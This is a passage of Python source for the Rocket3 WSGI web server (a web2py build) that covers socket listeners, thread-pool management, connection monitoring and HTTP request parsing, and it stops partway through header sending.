# -*- coding: utf-8 -*-
# This file is part of the Rocket Web Server
# Copyright (c) 2011 Timothy Farrell
# Modified by Massimo Di Pierro
# Removed python2 support and dependencies
# Import System Modules
import sys
import errno
import socket
import signal
import logging
import platform
import io
import urllib.parse
import time
import logging
import select
import threading
import traceback
import queue
import errno
import datetime
import os
import re
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
from email.utils import formatdate
from concurrent.futures import Future, ThreadPoolExecutor
from concurrent.futures.thread import _WorkItem
try:
import ssl
has_ssl = True
except ImportError:
has_ssl = False
class SSLError(socket.error):
pass
class NullHandler(logging.Handler):
"""A Logging handler to prevent library errors."""
def emit(self, record):
pass
log = logging.getLogger("Rocket")
log.addHandler(NullHandler())
# Define Constants
__version__ = "1.3"
SERVER_NAME = socket.gethostname()
SERVER_SOFTWARE = "Rocket3 %s" % __version__
HTTP_SERVER_SOFTWARE = "%s Python/%s" % (SERVER_SOFTWARE, sys.version.split(" ")[0])
BUF_SIZE = 16384
SOCKET_TIMEOUT = 10 # in secs
THREAD_STOP_CHECK_INTERVAL = (
1 # in secs, How often should threads check for a server stop message?
)
if hasattr(sys, "frozen"):
# py2installer
IS_JYTHON = False
else:
IS_JYTHON = platform.system() == "Java" # Handle special cases for Jython
IGNORE_ERRORS_ON_CLOSE = set([errno.ECONNABORTED, errno.ECONNRESET])
DEFAULT_LISTEN_QUEUE_SIZE = 5
DEFAULT_MIN_THREADS = 10
DEFAULT_MAX_THREADS = 0
DEFAULTS = dict(
LISTEN_QUEUE_SIZE=DEFAULT_LISTEN_QUEUE_SIZE,
MIN_THREADS=DEFAULT_MIN_THREADS,
MAX_THREADS=DEFAULT_MAX_THREADS,
)
__all__ = [
"__version__" "SERVER_SOFTWARE",
"HTTP_SERVER_SOFTWARE",
"BUF_SIZE",
"IS_JYTHON",
"IGNORE_ERRORS_ON_CLOSE",
"DEFAULTS",
"Rocket3",
"SERVER_NAME",
"NullHandler",
]
class Connection:
__slots__ = [
"setblocking",
"sendall",
"shutdown",
"makefile",
"fileno",
"client_addr",
"client_port",
"server_port",
"socket",
"start_time",
"ssl",
"secure",
"recv",
"send",
"read",
"write",
]
def __init__(self, sock_tuple, port, secure=False):
self.client_addr, self.client_port = sock_tuple[1][:2]
self.server_port = port
self.socket = sock_tuple[0]
self.start_time = time.time()
self.ssl = has_ssl and isinstance(self.socket, ssl.SSLSocket)
self.secure = secure
if IS_JYTHON:
# In Jython we must set TCP_NODELAY here since it does not
# inherit from the listening socket.
# See: http://bugs.jython.org/issue1309
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.settimeout(SOCKET_TIMEOUT)
self.shutdown = self.socket.shutdown
self.fileno = self.socket.fileno
self.setblocking = self.socket.setblocking
self.recv = self.socket.recv
self.send = self.socket.send
self.makefile = self.socket.makefile
if sys.platform == "darwin":
self.sendall = self._sendall_darwin
else:
self.sendall = self.socket.sendall
def _sendall_darwin(self, buf):
pending = len(buf)
offset = 0
while pending:
try:
sent = self.socket.send(buf[offset:])
pending -= sent
offset += sent
except socket.error:
info = sys.exc_info()
if info[1].args[0] != errno.EAGAIN:
raise
return offset
# FIXME - this is not ready for prime-time yet.
# def makefile(self, buf_size=BUF_SIZE):
# return FileLikeSocket(self, buf_size)
def close(self):
if hasattr(self.socket, "_sock"):
try:
self.socket._sock.close()
except socket.error:
info = sys.exc_info()
if info[1].args[0] != socket.EBADF:
raise info[1]
else:
pass
self.socket.close()
class FileLikeSocket:
def __init__(self, conn, buf_size=BUF_SIZE):
self.conn = conn
self.buf_size = buf_size
self.buffer = io.StringIO()
self.content_length = None
if self.conn.socket.gettimeout() == 0.0:
self.read = self.non_blocking_read
else:
self.read = self.blocking_read
def recv(self, size):
while True:
try:
return self.conn.recv(size)
except socket.error:
exc = sys.exc_info()
e = exc[1]
# FIXME - Don't raise socket_errors_nonblocking or socket_error_eintr
if e.args[0] not in set():
raise
def next(self):
data = self.readline()
if data == "":
raise StopIteration
return data
def non_blocking_read(self, size=None):
# Shamelessly adapted from Cherrypy!
bufr = self.buffer
bufr.seek(0, 2)
if size is None:
while True:
data = self.recv(self.buf_size)
if not data:
break
bufr.write(data)
self.buffer = io.StringIO()
return bufr.getvalue()
else:
buf_len = self.buffer.tell()
if buf_len >= size:
bufr.seek(0)
data = bufr.read(size)
self.buffer = io.StringIO(bufr.read())
return data
self.buffer = io.StringIO()
while True:
remaining = size - buf_len
data = self.recv(remaining)
if not data:
break
n = len(data)
if n == size and not buf_len:
return data
if n == remaining:
bufr.write(data)
del data
break
bufr.write(data)
buf_len += n
del data
return bufr.getvalue()
def blocking_read(self, length=None):
if length is None:
if self.content_length is not None:
length = self.content_length
else:
length = 1
try:
data = self.conn.recv(length)
except:
data = b""
return data
def readline(self):
data = b""
char = self.read(1)
while char not in (b"\n", b""):
line = repr(char)
data += char
char = self.read(1)
data += char
return data
def readlines(self, hint="ignored"):
return list(self)
def close(self):
self.conn = None
self.content_length = None
class WSGIFuture(Future):
def __init__(self, f_dict, *args, **kwargs):
Future.__init__(self, *args, **kwargs)
self.timeout = None
self._mem_dict = f_dict
self._lifespan = 30
self._name = None
self._start_time = time.time()
def set_running_or_notify_cancel(self):
if time.time() - self._start_time >= self._lifespan:
self.cancel()
else:
return super(WSGIFuture, self).set_running_or_notify_cancel()
def remember(self, name, lifespan=None):
self._lifespan = lifespan or self._lifespan
if name in self._mem_dict:
raise NameError(
'Cannot remember future by name "%s". ' % name
+ "A future already exists with that name."
)
self._name = name
self._mem_dict[name] = self
return self
def forget(self):
if self._name in self._mem_dict and self._mem_dict[self._name] is self:
del self._mem_dict[self._name]
self._name = None
class _WorkItem:
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except BaseException:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class WSGIExecutor(ThreadPoolExecutor):
multithread = True
multiprocess = False
def __init__(self, *args, **kwargs):
ThreadPoolExecutor.__init__(self, *args, **kwargs)
self.futures = dict()
def submit(self, fn, *args, **kwargs):
if self._shutdown_lock.acquire():
if self._shutdown:
self._shutdown_lock.release()
raise RuntimeError("Cannot schedule new futures after shutdown")
f = WSGIFuture(self.futures)
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._shutdown_lock.release()
return f
else:
return False
class FuturesMiddleware:
"""Futures middleware that adds a Futures Executor to the environment"""
def __init__(self, app, threads=5):
self.app = app
self.executor = WSGIExecutor(threads)
def __call__(self, environ, start_response):
environ["wsgiorg.executor"] = self.executor
environ["wsgiorg.futures"] = self.executor.futures
return self.app(environ, start_response)
# Monolithic build...end of module: rocket/futures.py
# Monolithic build...start of module: rocket/listener.py
class Listener(threading.Thread):
"""The Listener class is a class responsible for accepting connections
and queuing them to be processed by a worker thread."""
def __init__(self, interface, queue_size, active_queue, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
# Instance variables
self.active_queue = active_queue
self.interface = interface
self.addr = interface[0]
self.port = interface[1]
self.secure = len(interface) >= 4
self.clientcert_req = len(interface) == 5 and interface[4]
self.thread = None
self.ready = False
# Error Log
self.err_log = logging.getLogger("Rocket.Errors.Port%i" % self.port)
self.err_log.addHandler(NullHandler())
# Build the socket
if ":" in self.addr:
listener = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not listener:
self.err_log.error("Failed to get socket.")
return
if self.secure:
if not has_ssl:
self.err_log.error("ssl module required to serve HTTPS.")
return
elif not os.path.exists(interface[2]):
data = (interface[2], interface[0], interface[1])
self.err_log.error(
"Cannot find key file " "'%s'. Cannot bind to %s:%s" % data
)
return
elif not os.path.exists(interface[3]):
data = (interface[3], interface[0], interface[1])
self.err_log.error(
"Cannot find certificate file " "'%s'. Cannot bind to %s:%s" % data
)
return
if self.clientcert_req and not os.path.exists(interface[4]):
data = (interface[4], interface[0], interface[1])
self.err_log.error(
"Cannot find root ca certificate file "
"'%s'. Cannot bind to %s:%s" % data
)
return
# Set socket options
try:
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except:
msg = "Cannot share socket. Using %s:%i exclusively."
self.err_log.warning(msg % (self.addr, self.port))
try:
if not IS_JYTHON:
listener.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except:
msg = "Cannot set TCP_NODELAY, things might run a little slower"
self.err_log.warning(msg)
try:
listener.bind((self.addr, self.port))
except:
msg = "Socket %s:%i in use by other process and it won't share."
self.err_log.error(msg % (self.addr, self.port))
else:
# We want socket operations to timeout periodically so we can
# check if the server is shutting down
listener.settimeout(THREAD_STOP_CHECK_INTERVAL)
# Listen for new connections allowing queue_size number of
# connections to wait before rejecting a connection.
listener.listen(queue_size)
self.listener = listener
self.ready = True
def wrap_socket(self, sock):
try:
if self.clientcert_req:
ca_certs = self.interface[4]
cert_reqs = ssl.CERT_OPTIONAL
sock = ssl.wrap_socket(
sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
ssl_version=ssl.PROTOCOL_SSLv23,
)
else:
sock = ssl.wrap_socket(
sock,
keyfile=self.interface[2],
certfile=self.interface[3],
server_side=True,
ssl_version=ssl.PROTOCOL_SSLv23,
)
except SSLError:
# Generally this happens when an HTTP request is received on a
# secure socket. We don't do anything because it will be detected
# by Worker and dealt with appropriately.
pass
return sock
def start(self):
if not self.ready:
self.err_log.warning("Listener started when not ready.")
return
if self.thread is not None and self.thread.is_alive():
self.err_log.warning("Listener already running.")
return
self.thread = threading.Thread(target=self.listen, name="Port" + str(self.port))
self.thread.start()
def is_alive(self):
if self.thread is None:
return False
return self.thread.is_alive()
def join(self):
if self.thread is None:
return
self.ready = False
self.thread.join()
del self.thread
self.thread = None
self.ready = True
def listen(self):
if __debug__:
self.err_log.debug("Entering main loop.")
while True:
try:
sock, addr = self.listener.accept()
if self.secure:
sock = self.wrap_socket(sock)
self.active_queue.put(((sock, addr), self.interface[1], self.secure))
except socket.timeout:
# socket.timeout will be raised every
# THREAD_STOP_CHECK_INTERVAL seconds. When that happens,
# we check if it's time to die.
if not self.ready:
if __debug__:
self.err_log.debug("Listener exiting.")
return
else:
continue
except:
self.err_log.error(traceback.format_exc())
# Monolithic build...end of module: rocket/listener.py
# Monolithic build...start of module: rocket/main.py
# Setup Logging
class Rocket3:
"""The Rocket class is responsible for handling threads and accepting and
dispatching connections."""
def __init__(
self,
interfaces=("127.0.0.1", 8000),
method="wsgi",
app_info=None,
min_threads=None,
max_threads=None,
queue_size=None,
timeout=600,
handle_signals=True,
):
self.handle_signals = handle_signals
self.startstop_lock = threading.Lock()
self.timeout = timeout
if not isinstance(interfaces, list):
self.interfaces = [interfaces]
else:
self.interfaces = interfaces
if min_threads is None:
min_threads = DEFAULTS["MIN_THREADS"]
if max_threads is None:
max_threads = DEFAULTS["MAX_THREADS"]
if not queue_size:
if hasattr(socket, "SOMAXCONN"):
queue_size = socket.SOMAXCONN
else:
queue_size = DEFAULTS["LISTEN_QUEUE_SIZE"]
if max_threads and queue_size > max_threads:
queue_size = max_threads
if isinstance(app_info, dict):
app_info["server_software"] = SERVER_SOFTWARE
self.monitor_queue = queue.Queue()
self.active_queue = queue.Queue()
self._threadpool = ThreadPool(
get_method(method),
app_info=app_info,
active_queue=self.active_queue,
monitor_queue=self.monitor_queue,
min_threads=min_threads,
max_threads=max_threads,
)
# Build our socket listeners
self.listeners = [
Listener(i, queue_size, self.active_queue) for i in self.interfaces
]
for ndx in range(len(self.listeners) - 1, 0, -1):
if not self.listeners[ndx].ready:
del self.listeners[ndx]
if not self.listeners:
log.critical("No interfaces to listen on...closing.")
sys.exit(1)
def _sigterm(self, signum, frame):
log.info("Received SIGTERM")
self.stop()
def _sighup(self, signum, frame):
log.info("Received SIGHUP")
self.restart()
def start(self, background=False):
log.info("Starting %s" % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Set up our shutdown signals
if self.handle_signals:
try:
signal.signal(signal.SIGTERM, self._sigterm)
signal.signal(signal.SIGUSR1, self._sighup)
except:
log.debug("This platform does not support signals.")
# Start our worker threads
self._threadpool.start()
# Start our monitor thread
self._monitor = Monitor(
self.monitor_queue, self.active_queue, self.timeout, self._threadpool
)
self._monitor.setDaemon(True)
self._monitor.start()
# I know that EXPR and A or B is bad but I'm keeping it for Py2.4
# compatibility.
str_extract = lambda l: (l.addr, l.port, "*" if l.secure else "")
msg = "Listening on sockets: "
msg += ", ".join(["%s:%i%s" % str_extract(l) for l in self.listeners])
log.info(msg)
for l in self.listeners:
l.start()
finally:
self.startstop_lock.release()
if background:
return
while self._monitor.is_alive():
try:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
except KeyboardInterrupt:
# Capture a keyboard interrupt when running from a console
break
except:
if self._monitor.is_alive():
log.error(traceback.format_exc())
continue
return self.stop()
def stop(self, stoplogging=False):
log.info("Stopping %s" % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Stop listeners
for l in self.listeners:
l.ready = False
# Encourage a context switch
time.sleep(0.01)
for l in self.listeners:
if l.is_alive():
l.join()
# Stop Monitor
self._monitor.stop()
if self._monitor.is_alive():
self._monitor.join()
# Stop Worker threads
self._threadpool.stop()
if stoplogging:
logging.shutdown()
msg = "Calling logging.shutdown() is now the responsibility of \
the application developer. Please update your \
applications to no longer call rocket.stop(True)"
try:
raise DeprecationWarning(msg)
except ImportError:
raise RuntimeError(msg)
finally:
self.startstop_lock.release()
def restart(self):
self.stop()
self.start()
class Monitor(threading.Thread):
# Monitor worker class.
def __init__(
self, monitor_queue, active_queue, timeout, threadpool, *args, **kwargs
):
threading.Thread.__init__(self, *args, **kwargs)
self._threadpool = threadpool
# Instance Variables
self.monitor_queue = monitor_queue
self.active_queue = active_queue
self.timeout = timeout
self.log = logging.getLogger("Rocket.Monitor")
self.log.addHandler(NullHandler())
self.connections = set()
self.active = False
def run(self):
self.active = True
conn_list = list()
list_changed = False
# We need to make sure the queue is empty before we start
while not self.monitor_queue.empty():
self.monitor_queue.get()
if __debug__:
self.log.debug("Entering monitor loop.")
# Enter thread main loop
while self.active:
# Move the queued connections to the selection pool
while not self.monitor_queue.empty():
if __debug__:
self.log.debug('In "receive timed-out connections" loop.')
c = self.monitor_queue.get()
if c is None:
# A non-client is a signal to die
if __debug__:
self.log.debug("Received a death threat.")
self.stop()
break
self.log.debug("Received a timed out connection.")
if __debug__:
assert c not in self.connections
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it.
c.setblocking(False)
if __debug__:
self.log.debug("Adding connection to monitor list.")
self.connections.add(c)
list_changed = True
# Wait on those connections
if list_changed:
conn_list = list(self.connections)
list_changed = False
try:
if len(conn_list):
readable = select.select(
conn_list, [], [], THREAD_STOP_CHECK_INTERVAL
)[0]
else:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
readable = []
if not self.active:
break
# If we have any readable connections, put them back
for r in readable:
if __debug__:
self.log.debug("Restoring readable connection")
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it, but the rest of the code requires
# that it be in blocking mode.
r.setblocking(True)
r.start_time = time.time()
self.active_queue.put(r)
self.connections.remove(r)
list_changed = True
except:
if self.active:
raise
else:
break
# If we have any stale connections, kill them off.
if self.timeout:
now = time.time()
stale = set()
for c in self.connections:
if (now - c.start_time) >= self.timeout:
stale.add(c)
for c in stale:
self.connections.remove(c)
list_changed = True
try:
c.close()
finally:
del c
# Dynamically resize the threadpool to adapt to our changing needs.
self._threadpool.dynamic_resize()
def stop(self):
self.active = False
if __debug__:
self.log.debug("Flushing waiting connections")
while self.connections:
c = self.connections.pop()
try:
c.close()
finally:
del c
if __debug__:
self.log.debug("Flushing queued connections")
while not self.monitor_queue.empty():
c = self.monitor_queue.get()
if c is None:
continue
try:
c.close()
finally:
del c
# Place a None sentry value to cause the monitor to die.
self.monitor_queue.put(None)
# Monolithic build...end of module: rocket/monitor.py
# Monolithic build...start of module: rocket/threadpool.py
# Setup Logging
log = logging.getLogger("Rocket.Errors.ThreadPool")
log.addHandler(NullHandler())
class ThreadPool:
"""The ThreadPool class is a container class for all the worker threads. It
manages the number of actively running threads."""
def __init__(
self,
method,
app_info,
active_queue,
monitor_queue,
min_threads=DEFAULTS["MIN_THREADS"],
max_threads=DEFAULTS["MAX_THREADS"],
):
if __debug__:
log.debug("Initializing ThreadPool.")
self.check_for_dead_threads = 0
self.active_queue = active_queue
self.worker_class = method
self.min_threads = min_threads
self.max_threads = max_threads
self.monitor_queue = monitor_queue
self.stop_server = False
self.alive = False
# TODO - Optimize this based on some real-world usage data
self.grow_threshold = int(max_threads / 10) + 2
if not isinstance(app_info, dict):
app_info = dict()
if app_info.get("futures"):
app_info["executor"] = WSGIExecutor(max([DEFAULTS["MIN_THREADS"], 2]))
app_info.update(max_threads=max_threads, min_threads=min_threads)
self.min_threads = min_threads
self.app_info = app_info
self.threads = set()
def start(self):
self.stop_server = False
if __debug__:
log.debug("Starting threads.")
self.grow(self.min_threads)
self.alive = True
def stop(self):
self.alive = False
if __debug__:
log.debug("Stopping threads.")
self.stop_server = True
# Prompt the threads to die
self.shrink(len(self.threads))
# Stop futures initially
if self.app_info.get("futures"):
if __debug__:
log.debug(
"Future executor is present. Python will not "
"exit until all jobs have finished."
)
self.app_info["executor"].shutdown(wait=False)
# Give them the gun
# active_threads = [t for t in self.threads if t.is_alive()]
# while active_threads:
# t = active_threads.pop()
# t.kill()
# Wait until they pull the trigger
for t in self.threads:
if t.is_alive():
t.join()
# Clean up the mess
self.bring_out_your_dead()
def bring_out_your_dead(self):
# Remove dead threads from the pool
dead_threads = [t for t in self.threads if not t.is_alive()]
for t in dead_threads:
if __debug__:
log.debug("Removing dead thread: %s." % t.getName())
self.threads.remove(t)
self.check_for_dead_threads -= len(dead_threads)
def grow(self, amount=None):
if self.stop_server:
return
if not amount:
amount = self.max_threads
if self.alive:
amount = min([amount, self.max_threads - len(self.threads)])
if __debug__:
log.debug("Growing by %i." % amount)
for x in range(amount):
worker = self.worker_class(
self.app_info, self.active_queue, self.monitor_queue
)
worker.setDaemon(True)
self.threads.add(worker)
worker.start()
def shrink(self, amount=1):
if __debug__:
log.debug("Shrinking by %i." % amount)
self.check_for_dead_threads += amount
for x in range(amount):
self.active_queue.put(None)
def dynamic_resize(self):
if self.max_threads > self.min_threads or self.max_threads == 0:
if self.check_for_dead_threads > 0:
self.bring_out_your_dead()
queueSize = self.active_queue.qsize()
threadCount = len(self.threads)
if __debug__:
log.debug(
"Examining ThreadPool. %i threads and %i Q'd conxions"
% (threadCount, queueSize)
)
if queueSize == 0 and threadCount > self.min_threads:
self.shrink()
elif queueSize > self.grow_threshold:
self.grow(queueSize)
# Monolithic build...end of module: rocket/threadpool.py
# Monolithic build...start of module: rocket/worker.py
# Define Constants
re_SLASH = re.compile("%2F", re.IGNORECASE)
re_REQUEST_LINE = re.compile(
r"""^
(?P<method>OPTIONS|GET|HEAD|POST|PUT|DELETE|PATCH|TRACE|CONNECT) # Req Method
\ # single space
(
(?P<scheme>[^:/]+) # Scheme
(://) #
(?P<host>[^/]+) # Host
)? #
(?P<path>(\*|/[^ \?]*)) # Path
(\? (?P<query_string>[^ ]*))? # Query String
\ # single space
(?P<protocol>HTTPS?/1\.[01]) # Protocol
$
""",
re.X,
)
LOG_LINE = '%(client_ip)s - "%(request_line)s" - %(status)s %(size)s'
RESPONSE = """\
%s %s
Content-Length: %i
Content-Type: %s
%s
"""
if IS_JYTHON:
HTTP_METHODS = set(
["OPTIONS", "GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "CONNECT"]
)
class Worker(threading.Thread):
"""The Worker class is a base class responsible for receiving connections
and (a subclass) will run an application to process the the connection"""
def __init__(self, app_info, active_queue, monitor_queue, *args, **kwargs):
threading.Thread.__init__(self, *args, **kwargs)
# Instance Variables
self.app_info = app_info
self.active_queue = active_queue
self.monitor_queue = monitor_queue
self.size = 0
self.status = "200 OK"
self.closeConnection = True
self.request_line = ""
self.protocol = "HTTP/1.1"
# Request Log
self.req_log = logging.getLogger("Rocket.Requests")
self.req_log.addHandler(NullHandler())
# Error Log
self.err_log = logging.getLogger("Rocket.Errors." + self.getName())
self.err_log.addHandler(NullHandler())
def _handleError(self, typ, val, tb):
if typ == SSLError:
if "timed out" in str(val.args[0]):
typ = SocketTimeout
if typ == SocketTimeout:
if __debug__:
self.err_log.debug("Socket timed out")
self.monitor_queue.put(self.conn)
return True
if typ == SocketClosed:
self.closeConnection = True
if __debug__:
self.err_log.debug("Client closed socket")
return False
if typ == BadRequest:
self.closeConnection = True
if __debug__:
self.err_log.debug("Client sent a bad request")
return True
if typ == socket.error:
self.closeConnection = True
if val.args[0] in IGNORE_ERRORS_ON_CLOSE:
if __debug__:
self.err_log.debug(
"Ignorable socket Error received..." "closing connection."
)
return False
else:
self.status = "999 Utter Server Failure"
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error(
"Unhandled Error when serving " "connection:\n" + "\n".join(tb_fmt)
)
return False
self.closeConnection = True
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error("\n".join(tb_fmt))
self.send_response("500 Server Error")
return False
def run(self):
if __debug__:
self.err_log.debug("Entering main loop.")
# Enter thread main loop
while True:
conn = self.active_queue.get()
if not conn:
# A non-client is a signal to die
if __debug__:
self.err_log.debug("Received a death threat.")
return conn
if isinstance(conn, tuple):
conn = Connection(*conn)
self.conn = conn
if conn.ssl != conn.secure:
self.err_log.info("Received HTTP connection on HTTPS port.")
self.send_response("400 Bad Request")
self.closeConnection = True
conn.close()
continue
else:
if __debug__:
self.err_log.debug("Received a connection.")
self.closeConnection = False
# Enter connection serve loop
while True:
if __debug__:
self.err_log.debug("Serving a request")
try:
self.run_app(conn)
except:
exc = sys.exc_info()
handled = self._handleError(*exc)
if handled:
break
finally:
if self.request_line:
log_info = dict(
client_ip=conn.client_addr,
time=datetime.datetime.now().strftime("%c"),
status=self.status.split(" ")[0],
size=self.size,
request_line=self.request_line,
)
self.req_log.info(LOG_LINE % log_info)
if self.closeConnection:
try:
conn.close()
except:
self.err_log.error(str(traceback.format_exc()))
break
def run_app(self, conn):
# Must be overridden with a method reads the request from the socket
# and sends a response.
self.closeConnection = True
raise NotImplementedError("Overload this method!")
def send_response(self, status):
stat_msg = status.split(" ", 1)[1]
msg = RESPONSE % (self.protocol, status, len(stat_msg), "text/plain", stat_msg)
try:
self.conn.sendall(msg.encode("utf8"))
except socket.timeout:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received timeout error'
self.err_log.error(msg % status)
except socket.error:
self.closeConnection = True
msg = 'Tried to send "%s" to client but received socket error'
self.err_log.error(msg % status)
def read_request_line(self, sock_file):
self.request_line = ""
try:
# Grab the request line
d = sock_file.readline()
d = d.decode("ISO-8859-1")
if d == "\r\n":
# Allow an extra NEWLINE at the beginning per HTTP 1.1 spec
if __debug__:
self.err_log.debug("Client sent newline")
d = sock_file.readline()
d = d.decode("ISO-8859-1")
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
except TypeError:
raise SocketClosed(
"SSL bug caused closure of socket. See "
'"https://groups.google.com/d/topic/web2py/P_Gw0JxWzCs".'
)
d = d.strip()
if not d:
if __debug__:
self.err_log.debug("Client did not send a recognizable request.")
raise SocketClosed("Client closed socket.")
self.request_line = d
# NOTE: I've replaced the traditional method of procedurally breaking
# apart the request line with a (rather unsightly) regular expression.
# However, Java's regexp support sucks so bad that it actually takes
# longer in Jython to process the regexp than procedurally. So I've
# left the old code here for Jython's sake...for now.
if IS_JYTHON:
return self._read_request_line_jython(d)
match = re_REQUEST_LINE.match(d)
if not match:
self.send_response("400 Bad Request")
raise BadRequest
req = match.groupdict()
for k, v in req.items():
if not v:
req[k] = ""
if k == "path":
req["path"] = r"%2F".join(
[urllib.parse.unquote(x) for x in re_SLASH.split(v)]
)
self.protocol = req["protocol"]
return req
def _read_request_line_jython(self, d):
d = d.strip()
try:
method, uri, proto = d.split(" ")
if (
not proto.startswith("HTTP")
or proto[-3:] not in ("1.0", "1.1")
or method not in HTTP_METHODS
):
self.send_response("400 Bad Request")
raise BadRequest
except ValueError:
self.send_response("400 Bad Request")
raise BadRequest
req = dict(method=method, protocol=proto)
scheme = ""
host = ""
if uri == "*" or uri.startswith("/"):
path = uri
elif "://" in uri:
scheme, rest = uri.split("://")
host, path = rest.split("/", 1)
path = "/" + path
else:
self.send_response("400 Bad Request")
raise BadRequest
query_string = ""
if "?" in path:
path, query_string = path.split("?", 1)
path = r"%2F".join([urllib.parse.unquote(x) for x in re_SLASH.split(path)])
req.update(
path=path, query_string=query_string, scheme=scheme.lower(), host=host
)
return req
def read_headers(self, sock_file):
try:
headers = dict()
lname = None
lval = None
while True:
l = sock_file.readline()
try:
l = str(l, "ISO-8859-1")
except UnicodeDecodeError:
self.err_log.warning("Client sent invalid header: " + repr(l))
if l.strip().replace("\0", "") == "":
break
if l[0] in " \t" and lname:
# Some headers take more than one line
lval += " " + l.strip()
else:
# HTTP header values are latin-1 encoded
l = l.split(":", 1)
# HTTP header names are us-ascii encoded
lname = l[0].strip().upper().replace("-", "_")
lval = l[-1].strip()
headers[str(lname)] = str(lval)
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
return headers
class SocketTimeout(Exception):
"""Exception for when a socket times out between requests."""
pass
class BadRequest(Exception):
"""Exception for when a client sends an incomprehensible request."""
pass
class SocketClosed(Exception):
"""Exception for when a socket is closed by the client."""
pass
class ChunkedReader:
def __init__(self, sock_file):
self.stream = sock_file
self.chunk_size = 0
def _read_header(self):
chunk_len = ""
try:
while "" == chunk_len:
chunk_len = self.stream.readline().strip()
return int(chunk_len, 16)
except ValueError:
return 0
def read(self, size):
data = b""
chunk_size = self.chunk_size
while size:
if not chunk_size:
chunk_size = self._read_header()
if size < chunk_size:
data += self.stream.read(size)
chunk_size -= size
break
else:
if not chunk_size:
break
data += self.stream.read(chunk_size)
size -= chunk_size
chunk_size = 0
self.chunk_size = chunk_size
return data
def readline(self):
data = b""
c = self.read(1)
while c and c != b"\n":
data += c
c = self.read(1)
data += c
return data
def readlines(self):
yield self.readline()
def get_method(method):
methods = dict(wsgi=WSGIWorker)
return methods[method.lower()]
# Monolithic build...end of module: rocket/worker.py
# Monolithic build...start of module: rocket/methods/__init__.py
# Monolithic build...end of module: rocket/methods/__init__.py
# Monolithic build...start of module: rocket/methods/wsgi.py
# Define Constants
NEWLINE = b"\r\n"
HEADER_RESPONSE = """HTTP/1.1 %s\r\n%s"""
BASE_ENV = {
"SERVER_NAME": SERVER_NAME,
"SCRIPT_NAME": "", # Direct call WSGI does not need a name
"wsgi.errors": sys.stderr,
"wsgi.version": (1, 0),
"wsgi.multiprocess": False,
"wsgi.run_once": False,
"wsgi.file_wrapper": FileWrapper,
}
class WSGIWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
if isinstance(self.app_info, dict):
multithreaded = self.app_info.get("max_threads") != 1
else:
multithreaded = False
self.base_environ = dict(
{
"SERVER_SOFTWARE": self.app_info["server_software"],
"wsgi.multithread": multithreaded,
}
)
self.base_environ.update(BASE_ENV)
# Grab our application
self.app = self.app_info.get("wsgi_app")
if not hasattr(self.app, "__call__"):
raise TypeError(
"The wsgi_app specified (%s) is not a valid WSGI application."
% repr(self.app)
)
# Enable futures
if self.app_info.get("futures"):
executor = self.app_info["executor"]
self.base_environ.update(
{"wsgiorg.executor": executor, "wsgiorg.futures": executor.futures}
)
def build_environ(self, sock_file, conn):
""" Build the execution environment. """
# Grab the request line
request = self.read_request_line(sock_file)
# Copy the Base Environment
environ = self.base_environ.copy()
# Grab the headers
for k, v in self.read_headers(sock_file).items():
environ[str("HTTP_" + k)] = v
# Add CGI Variables
environ["REQUEST_METHOD"] = request["method"]
environ["PATH_INFO"] = request["path"]
environ["SERVER_PROTOCOL"] = request["protocol"]
environ["SERVER_PORT"] = str(conn.server_port)
environ["REMOTE_PORT"] = str(conn.client_port)
environ["REMOTE_ADDR"] = str(conn.client_addr)
environ["QUERY_STRING"] = request["query_string"]
if "HTTP_CONTENT_LENGTH" in environ:
environ["CONTENT_LENGTH"] = environ["HTTP_CONTENT_LENGTH"]
if "HTTP_CONTENT_TYPE" in environ:
environ["CONTENT_TYPE"] = environ["HTTP_CONTENT_TYPE"]
# Save the request method for later
self.request_method = environ["REQUEST_METHOD"]
# Add Dynamic WSGI Variables
if conn.ssl:
environ["wsgi.url_scheme"] = "https"
environ["HTTPS"] = "on"
try:
peercert = conn.socket.getpeercert(binary_form=True)
environ["SSL_CLIENT_RAW_CERT"] = peercert and str(
ssl.DER_cert_to_PEM_cert(peercert)
)
except Exception:
print(sys.exc_info()[1])
else:
environ["wsgi.url_scheme"] = "http"
if environ.get("HTTP_TRANSFER_ENCODING", "") == "chunked":
environ["wsgi.input"] = ChunkedReader(sock_file)
else:
environ["wsgi.input"] = sock_file
return environ
def send_headers(self, data, sections):
h_set = self.header_set
# Does the app want us to send output chunked?
self.chunked = h_set.get("Transfer-Encoding", "").lower() == "chunked"
# Add a Date header if it's not there already
if not "Date" in h_set:
h_set["Date"] = formatdate(usegmt=True)
# Add a Server header if it's not there already
if not "Server" in h_set:
h_set["Server"] = HTTP_SERVER_SOFTWARE
if "Content-Length" in h_set:
self.size = int(h_set["Content-Length"])
else:
s = int(self.status.split(" ")[0])
